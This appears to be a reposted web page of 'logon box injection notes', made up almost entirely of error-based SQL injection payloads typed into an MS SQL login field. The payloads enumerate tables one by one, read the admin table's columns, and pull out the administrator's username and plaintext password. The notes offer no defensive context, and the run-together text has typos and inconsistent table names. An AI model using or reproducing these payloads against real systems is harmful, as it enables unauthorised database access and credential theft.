Logon box injection notes

Source: Internet
Author: User

1' and 1 = convert (int, (select top 1 name from sysobjects where xtype = 'U') and '1' = '1 first: select top 1 name form sysobjects where xtype = 'U' is used to check whether the user table in the database indicates that sysdiagrams exists. Table 1' and 1 = (select top 1 name from sysobjects where xtype = 'U ') and '1' = '1 sysdiagrams 1' and 1 = (select top 1 name from sysobjects where xtype = 'U' and name not in ('sysdiagrams ')) and '1' = '1 table: Commonness continue: 1' and 1 = (select top 1 name from sysobjects where xtype = 'U' and name not in ('sysdiagrams ', 'commonness ') and '1' = '1 table: Bargaingo on: 1 'and 1 = (select top 1 name from sysobjects where xtype = 'U' and name not in ('sysdiagrams', 'commonness ', 'bargain ')) and '1' = '1 table: ValidationReport continue: 1' and 1 = (select top 1 name from sysobjects where xtype = 'U' and name not in ('sysdiagrams ', 'commonness ', 'bargain', 'validationreport') and '1' = '1 table: Examine continue: 1 'and 1 = (select top 1 name from sysobjects where xtype = 'U' and name not in ('sysdiagrams', 'commonness ', 'bargain', 'validationreport ', 'examine') and '1' = '1 table: opinionbook1' and 1 = (select top 1 name from sysobjects where xtype = 'U' and name not in ('sysdiagrams ', 'commonness', 'bargain', 'validationreport ', 'examine', 'opinionbook') and '1' = '1 table: projectInformation1 'and 1 = (select top 1 name from sysobjects where xtype = 'U' and name not in ('sysdiagrams', 'commonness ', 'bargain', 'validationreport ', 'examine', 'opinionbook', 'projectinformation ') and '1' = '1 table: company1 'and 1 = (select top 1 name from sysobjects where xtype = 'U' and name not in ('sysdiagrams', 'commonness ', 'bargain', 'validationreport ', 'examine', 'opinionbook', 'projectinformation ', 'company') and '1' = '1 table: yinfu 1' and 1 = (select top 1 name from sysobjects where xtype = 'U' and name not in ('sysdiagrams ', 'commonness', 'bargain', 'validationreport ', 'examine', 'opinionbook', 'projectinformation ', 'company', 'yunfu') and '1' = '1 table: newsType1 'and 1 = (select top 1 name from sysobjects where xtype = 'U' and name not in ('sysdiagrams', 'commonness ', 'bargain', 'validationreport ', 'examine', 'opinionbook', 'projectinformation ', 'company', 'yunfu', 'newstype') and '1' = '1 table: adminType1 'and 1 = (select top 1 name from sysobjects where xtype = 'U' and name not in ('sysdiagrams', 'commonness ', 'bargain', 'validationreport ', 'examine', 'opinionbook', 'projectinformation ', 'company', 'infu', 'newstype', 'admintype') and '1' = '1 table: admin1 'and 1 = convert (int, (select top 1 col_name (object_id ('admin'), 1) from Admin )) and '1' = '11' and 1 = (select top 1 col_name (object_id ('admin'), 1) from admin) and '1' = '1 column: ID www.2cto. com1 'and 1 = (select top 1 col_name (object_id ('admin'), 2) from admin) and '1' = '1 column: loginName1 'and 1 = (select top 1 col_name (object_id ('admin'), 3) from admin) and '1' = '1 column: passward1 'and 1 = convert (int, (select top 1 LoginName from Admin) and '1' = '1admin1' and 1 = (select top 1 Passward from Admin) and '1' = '1admin123

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.